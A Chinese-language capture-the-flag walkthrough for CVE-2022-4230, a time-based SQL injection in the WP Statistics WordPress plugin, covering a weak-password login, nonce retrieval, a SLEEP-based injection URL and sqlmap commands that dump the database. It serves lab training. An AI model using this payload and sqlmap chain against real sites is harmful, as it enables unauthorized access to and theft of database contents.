春秋云境靶场之CVE-2022-4230

靶标介绍

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数，这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下，具有管理选项功能 (admin+) 的用户可以使用受影响的功能，但是该插件有一个设置允许低权限用户也可以访问它。

CVE-2022-4230漏洞介绍

wordpress插件漏洞。在小于13.2.9的版本中，该插件未转义参数，这可能允许经过身份验证的用户执行 SQL 注入攻击。

漏洞利用方法

以具有查看 WP 统计权限的用户身份登录，并通过 https://example.com/wp-admin/admin-ajax.php?action=rest-nonce 获取一个 nonce，然后在以下 URL 中使用它，该 URL 将延迟 5 秒：http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5))) Mdgs)--%20HsBR

靶标攻克过程

 1、开启靶场后发现什么都没有

2、使用御剑进行扫描，访问readme.html出现以下界面

3、点击login page发现一个登陆页面

4、 左下角有个返回test，大概率是一个登录用户，这里使用弱口令test test进行登录

5、登录成功后，发现 WordPress的版本为6.6.2，存在CVE-2022-4230漏洞

 6、获取一个随机数http://eci-2ze6pwgwiogm9gvts0fs.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

7、根据漏洞利用方法和获取到的随机数，访问以下url： http://eci-2ze6pwgwiogm9gvts0fs.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=4624553bb7&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))%20Mdgs)--%20HsBR _wpnonce就是获取到的随机数   得到如下页面

8、 打开burp，将该页面的原始数据抓取出来保存为test.txt文件并放入kali，使用sqlmap进行注入

9、首先跑数据库的名称，爆破出wordpress

 sqlmap -r test.txt --batch --dbs    

  10、接着跑wordpress库中的表名，看到了敏感字段flag

sqlmap -r test.txt --batch -D wordpress --tables

 

11、继续跑flag表中的字段名   得到flag字段

sqlmap -r test.txt --batch -D wordpress -T flag --columns

 

12、最后将flag字段对应的值跑出来，即得到flag

sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump